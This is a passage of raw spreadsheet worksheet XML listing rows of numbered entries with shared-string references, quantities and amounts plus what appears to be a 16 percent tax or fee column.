      <c r="H937" s="10">
        <v>3</v>
      </c>
      <c r="I937" s="14">
        <v>235.89</v>
      </c>
      <c r="J937" s="15">
        <v>37.7424</v>
      </c>
      <c r="K937" s="16"/>
    </row>
    <row r="938" spans="2:11">
      <c r="B938" s="9">
        <v>966</v>
      </c>
      <c r="C938" s="238" t="s">
        <v>7154</v>
      </c>
      <c r="D938" s="238" t="s">
        <v>7155</v>
      </c>
      <c r="E938" s="238" t="s">
        <v>7156</v>
      </c>
      <c r="F938" s="9"/>
      <c r="G938" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H938" s="10">
        <v>9</v>
      </c>
      <c r="I938" s="14">
        <v>312.48</v>
      </c>
      <c r="J938" s="15">
        <v>49.9968</v>
      </c>
      <c r="K938" s="16"/>
    </row>
    <row r="939" spans="2:11">
      <c r="B939" s="9">
        <v>967</v>
      </c>
      <c r="C939" s="238" t="s">
        <v>7157</v>
      </c>
      <c r="D939" s="238" t="s">
        <v>7158</v>
      </c>
      <c r="E939" s="238" t="s">
        <v>7159</v>
      </c>
      <c r="F939" s="9"/>
      <c r="G939" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H939" s="10">
        <v>6</v>
      </c>
      <c r="I939" s="14">
        <v>201.59</v>
      </c>
      <c r="J939" s="15">
        <v>32.256</v>
      </c>
      <c r="K939" s="16"/>
    </row>
    <row r="940" spans="2:11">
      <c r="B940" s="9">
        <v>968</v>
      </c>
      <c r="C940" s="238" t="s">
        <v>7160</v>
      </c>
      <c r="D940" s="238" t="s">
        <v>7161</v>
      </c>
      <c r="E940" s="238" t="s">
        <v>7162</v>
      </c>
      <c r="F940" s="9"/>
      <c r="G940" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H940" s="10">
        <v>5</v>
      </c>
      <c r="I940" s="14">
        <v>38.88</v>
      </c>
      <c r="J940" s="15">
        <v>6.224</v>
      </c>
      <c r="K940" s="16"/>
    </row>
    <row r="941" spans="2:11">
      <c r="B941" s="9">
        <v>969</v>
      </c>
      <c r="C941" s="238" t="s">
        <v>7163</v>
      </c>
      <c r="D941" s="238" t="s">
        <v>7164</v>
      </c>
      <c r="E941" s="238" t="s">
        <v>7165</v>
      </c>
      <c r="F941" s="9"/>
      <c r="G941" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H941" s="10">
        <v>11</v>
      </c>
      <c r="I941" s="14">
        <v>105.38</v>
      </c>
      <c r="J941" s="15">
        <v>16.8608</v>
      </c>
      <c r="K941" s="16"/>
    </row>
    <row r="942" spans="2:11">
      <c r="B942" s="9">
        <v>970</v>
      </c>
      <c r="C942" s="238" t="s">
        <v>7166</v>
      </c>
      <c r="D942" s="238" t="s">
        <v>7167</v>
      </c>
      <c r="E942" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F942" s="9"/>
      <c r="G942" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H942" s="10">
        <v>14</v>
      </c>
      <c r="I942" s="14">
        <v>503.97</v>
      </c>
      <c r="J942" s="15">
        <v>80.64</v>
      </c>
      <c r="K942" s="16"/>
    </row>
    <row r="943" spans="2:11">
      <c r="B943" s="9">
        <v>971</v>
      </c>
      <c r="C943" s="238" t="s">
        <v>7168</v>
      </c>
      <c r="D943" s="238" t="s">
        <v>7169</v>
      </c>
      <c r="E943" s="238" t="s">
        <v>7170</v>
      </c>
      <c r="F943" s="238" t="s">
        <v>7171</v>
      </c>
      <c r="G943" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H943" s="10">
        <v>1</v>
      </c>
      <c r="I943" s="14">
        <v>358.96</v>
      </c>
      <c r="J943" s="15">
        <v>57.4336</v>
      </c>
      <c r="K943" s="16"/>
    </row>
    <row r="944" spans="2:11">
      <c r="B944" s="9">
        <v>972</v>
      </c>
      <c r="C944" s="238" t="s">
        <v>7172</v>
      </c>
      <c r="D944" s="238" t="s">
        <v>7173</v>
      </c>
      <c r="E944" s="238" t="s">
        <v>7170</v>
      </c>
      <c r="F944" s="238" t="s">
        <v>7174</v>
      </c>
      <c r="G944" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H944" s="10">
        <v>1</v>
      </c>
      <c r="I944" s="14">
        <v>341.88</v>
      </c>
      <c r="J944" s="15">
        <v>54.7008</v>
      </c>
      <c r="K944" s="16"/>
    </row>
    <row r="945" spans="2:11">
      <c r="B945" s="9">
        <v>973</v>
      </c>
      <c r="C945" s="238" t="s">
        <v>7175</v>
      </c>
      <c r="D945" s="238" t="s">
        <v>7176</v>
      </c>
      <c r="E945" s="238" t="s">
        <v>7177</v>
      </c>
      <c r="F945" s="9"/>
      <c r="G945" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H945" s="10">
        <v>15</v>
      </c>
      <c r="I945" s="14">
        <v>110.57</v>
      </c>
      <c r="J945" s="15">
        <v>17.688</v>
      </c>
      <c r="K945" s="16"/>
    </row>
    <row r="946" spans="2:11">
      <c r="B946" s="9">
        <v>974</v>
      </c>
      <c r="C946" s="238" t="s">
        <v>7178</v>
      </c>
      <c r="D946" s="238" t="s">
        <v>7179</v>
      </c>
      <c r="E946" s="238" t="s">
        <v>7180</v>
      </c>
      <c r="F946" s="9"/>
      <c r="G946" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H946" s="10">
        <v>2</v>
      </c>
      <c r="I946" s="14">
        <v>99.15</v>
      </c>
      <c r="J946" s="15">
        <v>15.8656</v>
      </c>
      <c r="K946" s="16"/>
    </row>
    <row r="947" spans="2:11">
      <c r="B947" s="9">
        <v>975</v>
      </c>
      <c r="C947" s="238" t="s">
        <v>7181</v>
      </c>
      <c r="D947" s="238" t="s">
        <v>7182</v>
      </c>
      <c r="E947" s="238" t="s">
        <v>7183</v>
      </c>
      <c r="F947" s="238" t="s">
        <v>6935</v>
      </c>
      <c r="G947" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H947" s="10">
        <v>4</v>
      </c>
      <c r="I947" s="14">
        <v>1340</v>
      </c>
      <c r="J947" s="15">
        <v>214.4</v>
      </c>
      <c r="K947" s="16"/>
    </row>
    <row r="948" spans="2:11">
      <c r="B948" s="9">
        <v>976</v>
      </c>
      <c r="C948" s="238" t="s">
        <v>7184</v>
      </c>
      <c r="D948" s="238" t="s">
        <v>7185</v>
      </c>
      <c r="E948" s="238" t="s">
        <v>7183</v>
      </c>
      <c r="F948" s="238" t="s">
        <v>7076</v>
      </c>
      <c r="G948" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H948" s="10">
        <v>1</v>
      </c>
      <c r="I948" s="14">
        <v>550</v>
      </c>
      <c r="J948" s="15">
        <v>88</v>
      </c>
      <c r="K948" s="16"/>
    </row>
    <row r="949" spans="2:11">
      <c r="B949" s="9">
        <v>977</v>
      </c>
      <c r="C949" s="238" t="s">
        <v>7186</v>
      </c>
      <c r="D949" s="238" t="s">
        <v>7187</v>
      </c>
      <c r="E949" s="238" t="s">
        <v>7183</v>
      </c>
      <c r="F949" s="238" t="s">
        <v>7188</v>
      </c>
      <c r="G949" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H949" s="10">
        <v>1</v>
      </c>
      <c r="I949" s="14">
        <v>295</v>
      </c>
      <c r="J949" s="15">
        <v>47.2</v>
      </c>
      <c r="K949" s="16"/>
    </row>
    <row r="950" spans="2:11">
      <c r="B950" s="9">
        <v>978</v>
      </c>
      <c r="C950" s="238" t="s">
        <v>7189</v>
      </c>
      <c r="D950" s="238" t="s">
        <v>7190</v>
      </c>
      <c r="E950" s="238" t="s">
        <v>7191</v>
      </c>
      <c r="F950" s="9"/>
      <c r="G950" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H950" s="10">
        <v>50</v>
      </c>
      <c r="I950" s="14">
        <v>1888.76</v>
      </c>
      <c r="J950" s="15">
        <v>302.24</v>
      </c>
      <c r="K950" s="16"/>
    </row>
    <row r="951" spans="2:11">
      <c r="B951" s="9">
        <v>979</v>
      </c>
      <c r="C951" s="238" t="s">
        <v>7192</v>
      </c>
      <c r="D951" s="238" t="s">
        <v>7193</v>
      </c>
      <c r="E951" s="238" t="s">
        <v>7194</v>
      </c>
      <c r="F951" s="9"/>
      <c r="G951" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H951" s="10">
        <v>21</v>
      </c>
      <c r="I951" s="14">
        <v>1019.07</v>
      </c>
      <c r="J951" s="15">
        <v>163.064</v>
      </c>
      <c r="K951" s="16"/>
    </row>
    <row r="952" spans="2:11">
      <c r="B952" s="9">
        <v>980</v>
      </c>
      <c r="C952" s="238" t="s">
        <v>7195</v>
      </c>
      <c r="D952" s="238" t="s">
        <v>7196</v>
      </c>
      <c r="E952" s="238" t="s">
        <v>7197</v>
      </c>
      <c r="F952" s="9"/>
      <c r="G952" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H952" s="10">
        <v>11</v>
      </c>
      <c r="I952" s="14">
        <v>1263.08</v>
      </c>
      <c r="J952" s="15">
        <v>202.104</v>
      </c>
      <c r="K952" s="16"/>
    </row>
    <row r="953" spans="2:11">
      <c r="B953" s="9">
        <v>981</v>
      </c>
      <c r="C953" s="238" t="s">
        <v>7198</v>
      </c>
      <c r="D953" s="238" t="s">
        <v>7199</v>
      </c>
      <c r="E953" s="238" t="s">
        <v>7200</v>
      </c>
      <c r="F953" s="9"/>
      <c r="G953" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H953" s="10">
        <v>5</v>
      </c>
      <c r="I953" s="14">
        <v>375</v>
      </c>
      <c r="J953" s="15">
        <v>60</v>
      </c>
      <c r="K953" s="16"/>
    </row>
    <row r="954" spans="2:11">
      <c r="B954" s="9">
        <v>982</v>
      </c>
      <c r="C954" s="238" t="s">
        <v>7201</v>
      </c>
      <c r="D954" s="238" t="s">
        <v>7202</v>
      </c>
      <c r="E954" s="238" t="s">
        <v>7203</v>
      </c>
      <c r="F954" s="9"/>
      <c r="G954" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H954" s="10">
        <v>6</v>
      </c>
      <c r="I954" s="14">
        <v>877.47</v>
      </c>
      <c r="J954" s="15">
        <v>140.4</v>
      </c>
      <c r="K954" s="16"/>
    </row>
    <row r="955" spans="2:11">
      <c r="B955" s="9">
        <v>983</v>
      </c>
      <c r="C955" s="238" t="s">
        <v>7204</v>
      </c>
      <c r="D955" s="238" t="s">
        <v>7205</v>
      </c>
      <c r="E955" s="238" t="s">
        <v>7206</v>
      </c>
      <c r="F955" s="9"/>
      <c r="G955" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H955" s="10">
        <v>1</v>
      </c>
      <c r="I955" s="14">
        <v>182.05</v>
      </c>
      <c r="J955" s="15">
        <v>29.128</v>
      </c>
      <c r="K955" s="16"/>
    </row>
    <row r="956" spans="2:11">
      <c r="B956" s="9">
        <v>984</v>
      </c>
      <c r="C956" s="238" t="s">
        <v>7207</v>
      </c>
      <c r="D956" s="238" t="s">
        <v>7208</v>
      </c>
      <c r="E956" s="238" t="s">
        <v>7209</v>
      </c>
      <c r="F956" s="9"/>
      <c r="G956" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H956" s="10">
        <v>12</v>
      </c>
      <c r="I956" s="14">
        <v>51.2</v>
      </c>
      <c r="J956" s="15">
        <v>8.2</v>
      </c>
      <c r="K956" s="16"/>
    </row>
    <row r="957" spans="2:11">
      <c r="B957" s="9">
        <v>985</v>
      </c>
      <c r="C957" s="238" t="s">
        <v>7210</v>
      </c>
      <c r="D957" s="238" t="s">
        <v>7211</v>
      </c>
      <c r="E957" s="238" t="s">
        <v>7212</v>
      </c>
      <c r="F957" s="9"/>
      <c r="G957" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H957" s="10">
        <v>1</v>
      </c>
      <c r="I957" s="14">
        <v>12.66</v>
      </c>
      <c r="J957" s="15">
        <v>2.024</v>
      </c>
      <c r="K957" s="16"/>
    </row>
    <row r="958" spans="2:11">
      <c r="B958" s="9">
        <v>986</v>
      </c>
      <c r="C958" s="238" t="s">
        <v>7213</v>
      </c>
      <c r="D958" s="238" t="s">
        <v>7214</v>
      </c>
      <c r="E958" s="238" t="s">
        <v>7215</v>
      </c>
      <c r="F958" s="9"/>
      <c r="G958" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H958" s="10">
        <v>6</v>
      </c>
      <c r="I958" s="14">
        <v>17.96</v>
      </c>
      <c r="J958" s="15">
        <v>2.872</v>
      </c>
      <c r="K958" s="16"/>
    </row>
    <row r="959" spans="2:11">
      <c r="B959" s="9">
        <v>987</v>
      </c>
      <c r="C959" s="238" t="s">
        <v>7216</v>
      </c>
      <c r="D959" s="238" t="s">
        <v>7217</v>
      </c>
      <c r="E959" s="238" t="s">
        <v>7218</v>
      </c>
      <c r="F959" s="9"/>
      <c r="G959" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H959" s="10">
        <v>10</v>
      </c>
      <c r="I959" s="14">
        <v>47</v>
      </c>
      <c r="J959" s="15">
        <v>7.52</v>
      </c>
      <c r="K959" s="16"/>
    </row>
    <row r="960" spans="2:11">
      <c r="B960" s="9">
        <v>988</v>
      </c>
      <c r="C960" s="238" t="s">
        <v>7219</v>
      </c>
      <c r="D960" s="238" t="s">
        <v>7220</v>
      </c>
      <c r="E960" s="238" t="s">
        <v>7221</v>
      </c>
      <c r="F960" s="9"/>
      <c r="G960" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H960" s="10">
        <v>3</v>
      </c>
      <c r="I960" s="14">
        <v>47.36</v>
      </c>
      <c r="J960" s="15">
        <v>7.576</v>
      </c>
      <c r="K960" s="16"/>
    </row>
    <row r="961" spans="2:11">
      <c r="B961" s="9">
        <v>989</v>
      </c>
      <c r="C961" s="238" t="s">
        <v>7222</v>
      </c>
      <c r="D961" s="238" t="s">
        <v>7223</v>
      </c>
      <c r="E961" s="238" t="s">
        <v>7224</v>
      </c>
      <c r="F961" s="9"/>
      <c r="G961" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H961" s="10">
        <v>10</v>
      </c>
      <c r="I961" s="14">
        <v>186.35</v>
      </c>
      <c r="J961" s="15">
        <v>29.824</v>
      </c>
      <c r="K961" s="16"/>
    </row>
    <row r="962" spans="2:11">
      <c r="B962" s="9">
        <v>990</v>
      </c>
      <c r="C962" s="238" t="s">
        <v>7225</v>
      </c>
      <c r="D962" s="238" t="s">
        <v>7226</v>
      </c>
      <c r="E962" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F962" s="9"/>
      <c r="G962" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H962" s="10">
        <v>109</v>
      </c>
      <c r="I962" s="14">
        <v>766.45</v>
      </c>
      <c r="J962" s="15">
        <v>122.6</v>
      </c>
      <c r="K962" s="16"/>
    </row>
    <row r="963" spans="2:11">
      <c r="B963" s="9">
        <v>991</v>
      </c>
      <c r="C963" s="238" t="s">
        <v>7228</v>
      </c>
      <c r="D963" s="238" t="s">
        <v>7229</v>
      </c>
      <c r="E963" s="238" t="s">
        <v>7230</v>
      </c>
      <c r="F963" s="9"/>
      <c r="G963" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H963" s="10">
        <v>636</v>
      </c>
      <c r="I963" s="14">
        <v>2553.53</v>
      </c>
      <c r="J963" s="15">
        <v>408.056</v>
      </c>
      <c r="K963" s="16"/>
    </row>
    <row r="964" spans="2:11">
      <c r="B964" s="9">
        <v>992</v>
      </c>
      <c r="C964" s="238" t="s">
        <v>7231</v>
      </c>
      <c r="D964" s="238" t="s">
        <v>7232</v>
      </c>
      <c r="E964" s="238" t="s">
        <v>7233</v>
      </c>
      <c r="F964" s="9"/>
      <c r="G964" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H964" s="10">
        <v>2</v>
      </c>
      <c r="I964" s="14">
        <v>50</v>
      </c>
      <c r="J964" s="15">
        <v>8</v>
      </c>
      <c r="K964" s="16"/>
    </row>
    <row r="965" spans="2:11">
      <c r="B965" s="9">
        <v>993</v>
      </c>
      <c r="C965" s="238" t="s">
        <v>7234</v>
      </c>
      <c r="D965" s="238" t="s">
        <v>7235</v>
      </c>
      <c r="E965" s="238" t="s">
        <v>7236</v>
      </c>
      <c r="F965" s="9"/>
      <c r="G965" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H965" s="10">
        <v>4</v>
      </c>
      <c r="I965" s="14">
        <v>170.94</v>
      </c>
      <c r="J965" s="15">
        <v>27.352</v>
      </c>
      <c r="K965" s="16"/>
    </row>
    <row r="966" spans="2:11">
      <c r="B966" s="9">
        <v>994</v>
      </c>
      <c r="C966" s="238" t="s">
        <v>7237</v>
      </c>
      <c r="D966" s="238" t="s">
        <v>7238</v>
      </c>
      <c r="E966" s="238" t="s">
        <v>7239</v>
      </c>
      <c r="F966" s="9"/>
      <c r="G966" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H966" s="10">
        <v>3</v>
      </c>
      <c r="I966" s="14">
        <v>93.79</v>
      </c>
      <c r="J966" s="15">
        <v>15.008</v>
      </c>
      <c r="K966" s="16"/>
    </row>
    <row r="967" spans="2:11">
      <c r="B967" s="9">
        <v>995</v>
      </c>
      <c r="C967" s="238" t="s">
        <v>7240</v>
      </c>
      <c r="D967" s="238" t="s">
        <v>7241</v>
      </c>
      <c r="E967" s="238" t="s">
        <v>7242</v>
      </c>
      <c r="F967" s="9"/>
      <c r="G967" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H967" s="10">
        <v>2</v>
      </c>
      <c r="I967" s="14">
        <v>466.02</v>
      </c>
      <c r="J967" s="15">
        <v>74.56</v>
      </c>
      <c r="K967" s="16"/>
    </row>
    <row r="968" spans="2:11">
      <c r="B968" s="9">
        <v>996</v>
      </c>
      <c r="C968" s="238" t="s">
        <v>7243</v>
      </c>
      <c r="D968" s="238" t="s">
        <v>7244</v>
      </c>
      <c r="E968" s="238" t="s">
        <v>7245</v>
      </c>
      <c r="F968" s="9"/>
      <c r="G968" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H968" s="10">
        <v>7</v>
      </c>
      <c r="I968" s="14">
        <v>29.91</v>
      </c>
      <c r="J968" s="15">
        <v>4.784</v>
      </c>
      <c r="K968" s="16"/>
    </row>
    <row r="969" spans="2:11">
      <c r="B969" s="9">
        <v>997</v>
      </c>
      <c r="C969" s="238" t="s">
        <v>7246</v>
      </c>
      <c r="D969" s="238" t="s">
        <v>6846</v>
      </c>
      <c r="E969" s="238" t="s">
        <v>7247</v>
      </c>
      <c r="F969" s="238" t="s">
        <v>7248</v>
      </c>
      <c r="G969" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H969" s="10">
        <v>3</v>
      </c>
      <c r="I969" s="14">
        <v>136.39</v>
      </c>
      <c r="J969" s="15">
        <v>21.824</v>
      </c>
      <c r="K969" s="16"/>
    </row>
    <row r="970" spans="2:11">
      <c r="B970" s="9">
        <v>998</v>
      </c>
      <c r="C970" s="238" t="s">
        <v>7249</v>
      </c>
      <c r="D970" s="238" t="s">
        <v>7250</v>
      </c>
      <c r="E970" s="238" t="s">
        <v>7251</v>
      </c>
      <c r="F970" s="9"/>
      <c r="G970" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H970" s="10">
        <v>1</v>
      </c>
      <c r="I970" s="14">
        <v>25</v>
      </c>
      <c r="J970" s="15">
        <v>4</v>
      </c>
      <c r="K970" s="16"/>
    </row>
    <row r="971" spans="2:11">
      <c r="B971" s="9">
        <v>999</v>
      </c>
      <c r="C971" s="238" t="s">
        <v>7252</v>
      </c>
      <c r="D971" s="238" t="s">
        <v>7253</v>
      </c>
      <c r="E971" s="238" t="s">
        <v>7254</v>
      </c>
      <c r="F971" s="9"/>
      <c r="G971" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H971" s="10">
        <v>1</v>
      </c>
      <c r="I971" s="14">
        <v>85</v>
      </c>
      <c r="J971" s="15">
        <v>13.6</v>
      </c>
      <c r="K971" s="16"/>
    </row>
    <row r="972" spans="2:11">
      <c r="B972" s="9">
        <v>1000</v>
      </c>
      <c r="C972" s="238" t="s">
        <v>7255</v>
      </c>
      <c r="D972" s="238" t="s">
        <v>4597</v>
      </c>
      <c r="E972" s="238" t="s">
        <v>4597</v>
      </c>
      <c r="F972" s="238" t="s">
        <v>7256</v>
      </c>
      <c r="G972" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H972" s="10">
        <v>7</v>
      </c>
      <c r="I972" s="14">
        <v>5167.38</v>
      </c>
      <c r="J972" s="15">
        <v>826.784</v>
      </c>
      <c r="K972" s="16"/>
    </row>
    <row r="973" spans="2:11">
      <c r="B973" s="9">
        <v>1001</v>
      </c>
      <c r="C973" s="238" t="s">
        <v>7257</v>
      </c>
      <c r="D973" s="238" t="s">
        <v>7258</v>
      </c>
      <c r="E973" s="238" t="s">
        <v>7259</v>
      </c>
      <c r="F973" s="9"/>
      <c r="G973" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H973" s="10">
        <v>1</v>
      </c>
      <c r="I973" s="14">
        <v>127.5</v>
      </c>
      <c r="J973" s="15">
        <v>20.4</v>
      </c>
      <c r="K973" s="16"/>
    </row>
    <row r="974" spans="2:11">
      <c r="B974" s="9">
        <v>1002</v>
      </c>
      <c r="C974" s="238" t="s">
        <v>7260</v>
      </c>
      <c r="D974" s="238" t="s">
        <v>7261</v>
      </c>
      <c r="E974" s="238" t="s">
        <v>7262</v>
      </c>
      <c r="F974" s="9"/>
      <c r="G974" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H974" s="10">
        <v>3</v>
      </c>
      <c r="I974" s="14">
        <v>246.65</v>
      </c>
      <c r="J974" s="15">
        <v>39.4656</v>
      </c>
      <c r="K974" s="16"/>
    </row>
    <row r="975" spans="2:11">
      <c r="B975" s="9">
        <v>1003</v>
      </c>
      <c r="C975" s="238" t="s">
        <v>7263</v>
      </c>
      <c r="D975" s="238" t="s">
        <v>7264</v>
      </c>
      <c r="E975" s="238" t="s">
        <v>7265</v>
      </c>
      <c r="F975" s="9"/>
      <c r="G975" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H975" s="10">
        <v>8</v>
      </c>
      <c r="I975" s="14">
        <v>799.69</v>
      </c>
      <c r="J975" s="15">
        <v>127.9488</v>
      </c>
      <c r="K975" s="16"/>
    </row>
    <row r="976" spans="2:11">
      <c r="B976" s="9">
        <v>1004</v>
      </c>
      <c r="C976" s="238" t="s">
        <v>7266</v>
      </c>
      <c r="D976" s="9"/>
      <c r="E976" s="238" t="s">
        <v>7267</v>
      </c>
      <c r="F976" s="9"/>
      <c r="G976" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H976" s="10">
        <v>6</v>
      </c>
      <c r="I976" s="14">
        <v>750.97</v>
      </c>
      <c r="J976" s="15">
        <v>120.1536</v>
      </c>
      <c r="K976" s="16"/>
    </row>
    <row r="977" spans="2:11">
      <c r="B977" s="9">
        <v>1005</v>
      </c>
      <c r="C977" s="238" t="s">
        <v>7268</v>
      </c>
      <c r="D977" s="238" t="s">
        <v>6979</v>
      </c>
      <c r="E977" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F977" s="9"/>
      <c r="G977" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H977" s="10">
        <v>42</v>
      </c>
      <c r="I977" s="14">
        <v>1050</v>
      </c>
      <c r="J977" s="15">
        <v>168</v>
      </c>
      <c r="K977" s="16"/>
    </row>
    <row r="978" spans="2:11">
      <c r="B978" s="9">
        <v>1006</v>
      </c>
      <c r="C978" s="238" t="s">
        <v>7269</v>
      </c>
      <c r="D978" s="238" t="s">
        <v>7270</v>
      </c>
      <c r="E978" s="238" t="s">
        <v>7271</v>
      </c>
      <c r="F978" s="9"/>
      <c r="G978" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H978" s="10">
        <v>13</v>
      </c>
      <c r="I978" s="14">
        <v>290.45</v>
      </c>
      <c r="J978" s="15">
        <v>46.4672</v>
      </c>
      <c r="K978" s="16"/>
    </row>
    <row r="979" spans="2:11">
      <c r="B979" s="9">
        <v>1007</v>
      </c>
      <c r="C979" s="238" t="s">
        <v>7272</v>
      </c>
      <c r="D979" s="238" t="s">
        <v>7273</v>
      </c>
      <c r="E979" s="238" t="s">
        <v>7274</v>
      </c>
      <c r="F979" s="9"/>
      <c r="G979" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H979" s="10">
        <v>2</v>
      </c>
      <c r="I979" s="14">
        <v>281.55</v>
      </c>
      <c r="J979" s="15">
        <v>45.0496</v>
      </c>
      <c r="K979" s="16"/>
    </row>
    <row r="980" spans="2:11">
      <c r="B980" s="9">
        <v>1008</v>
      </c>
      <c r="C980" s="238" t="s">
        <v>7275</v>
      </c>
      <c r="D980" s="238" t="s">
        <v>7276</v>
      </c>
      <c r="E980" s="238" t="s">
        <v>7277</v>
      </c>
      <c r="F980" s="9"/>
      <c r="G980" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H980" s="10">
        <v>67</v>
      </c>
      <c r="I980" s="14">
        <v>407.01</v>
      </c>
      <c r="J980" s="15">
        <v>65.0704</v>
      </c>
      <c r="K980" s="16"/>
    </row>
    <row r="981" spans="2:11">
      <c r="B981" s="9">
        <v>1009</v>
      </c>
      <c r="C981" s="238" t="s">
        <v>7278</v>
      </c>
      <c r="D981" s="238" t="s">
        <v>7279</v>
      </c>
      <c r="E981" s="238" t="s">
        <v>7280</v>
      </c>
      <c r="F981" s="238" t="s">
        <v>7281</v>
      </c>
      <c r="G981" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H981" s="10">
        <v>1</v>
      </c>
      <c r="I981" s="14">
        <v>662.42</v>
      </c>
      <c r="J981" s="15">
        <v>105.9872</v>
      </c>
      <c r="K981" s="16"/>
    </row>
    <row r="982" spans="2:11">
      <c r="B982" s="9">
        <v>1010</v>
      </c>
      <c r="C982" s="238" t="s">
        <v>7282</v>
      </c>
      <c r="D982" s="238" t="s">
        <v>7283</v>
      </c>
      <c r="E982" s="238" t="s">
        <v>7284</v>
      </c>
      <c r="F982" s="9"/>
      <c r="G982" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H982" s="10">
        <v>4</v>
      </c>
      <c r="I982" s="14">
        <v>398.06</v>
      </c>
      <c r="J982" s="15">
        <v>63.6928</v>
      </c>
      <c r="K982" s="16"/>
    </row>
    <row r="983" spans="2:11">
      <c r="B983" s="9">
        <v>1011</v>
      </c>
      <c r="C983" s="238" t="s">
        <v>7285</v>
      </c>
      <c r="D983" s="238" t="s">
        <v>7286</v>
      </c>
      <c r="E983" s="238" t="s">
        <v>7287</v>
      </c>
      <c r="F983" s="9"/>
      <c r="G983" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H983" s="10">
        <v>1</v>
      </c>
      <c r="I983" s="14">
        <v>1530.48</v>
      </c>
      <c r="J983" s="15">
        <v>489.7536</v>
      </c>
      <c r="K983" s="16"/>
    </row>
    <row r="984" spans="2:11">
      <c r="B984" s="9">
        <v>1012</v>
      </c>
      <c r="C984" s="238" t="s">
        <v>7288</v>
      </c>
      <c r="D984" s="238" t="s">
        <v>7289</v>
      </c>
      <c r="E984" s="238" t="s">
        <v>7290</v>
      </c>
      <c r="F984" s="9"/>
      <c r="G984" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H984" s="10">
        <v>52</v>
      </c>
      <c r="I984" s="14">
        <v>496.6</v>
      </c>
      <c r="J984" s="15">
        <v>79.456</v>
      </c>
      <c r="K984" s="16"/>
    </row>
    <row r="985" spans="2:11">
      <c r="B985" s="9">
        <v>1013</v>
      </c>
      <c r="C985" s="238" t="s">
        <v>7291</v>
      </c>
      <c r="D985" s="238" t="s">
        <v>7292</v>
      </c>
      <c r="E985" s="238" t="s">
        <v>7293</v>
      </c>
      <c r="F985" s="9"/>
      <c r="G985" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H985" s="10">
        <v>1</v>
      </c>
      <c r="I985" s="14">
        <v>120.62</v>
      </c>
      <c r="J985" s="15">
        <v>19.2992</v>
      </c>
      <c r="K985" s="16"/>
    </row>
    <row r="986" spans="2:11">
      <c r="B986" s="9">
        <v>1014</v>
      </c>
      <c r="C986" s="238" t="s">
        <v>7294</v>
      </c>
      <c r="D986" s="238" t="s">
        <v>7295</v>
      </c>
      <c r="E986" s="238" t="s">
        <v>7296</v>
      </c>
      <c r="F986" s="9"/>
      <c r="G986" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H986" s="10">
        <v>1</v>
      </c>
      <c r="I986" s="14">
        <v>64.42</v>
      </c>
      <c r="J986" s="15">
        <v>10.3072</v>
      </c>
      <c r="K986" s="16"/>
    </row>
    <row r="987" spans="2:11">
      <c r="B987" s="9">
        <v>1015</v>
      </c>
      <c r="C987" s="238" t="s">
        <v>7297</v>
      </c>
      <c r="D987" s="238" t="s">
        <v>7298</v>
      </c>
      <c r="E987" s="238" t="s">
        <v>7299</v>
      </c>
      <c r="F987" s="9"/>
      <c r="G987" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H987" s="10">
        <v>2</v>
      </c>
      <c r="I987" s="14">
        <v>1765.59</v>
      </c>
      <c r="J987" s="15">
        <v>282.496</v>
      </c>
      <c r="K987" s="16"/>
    </row>
    <row r="988" spans="2:11">
      <c r="B988" s="9">
        <v>1016</v>
      </c>
      <c r="C988" s="238" t="s">
        <v>7300</v>
      </c>
      <c r="D988" s="238" t="s">
        <v>7301</v>
      </c>
      <c r="E988" s="238" t="s">
        <v>7302</v>
      </c>
      <c r="F988" s="9"/>
      <c r="G988" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H988" s="10">
        <v>77</v>
      </c>
      <c r="I988" s="14">
        <v>1438.76</v>
      </c>
      <c r="J988" s="15">
        <v>230.2608</v>
      </c>
      <c r="K988" s="16"/>
    </row>
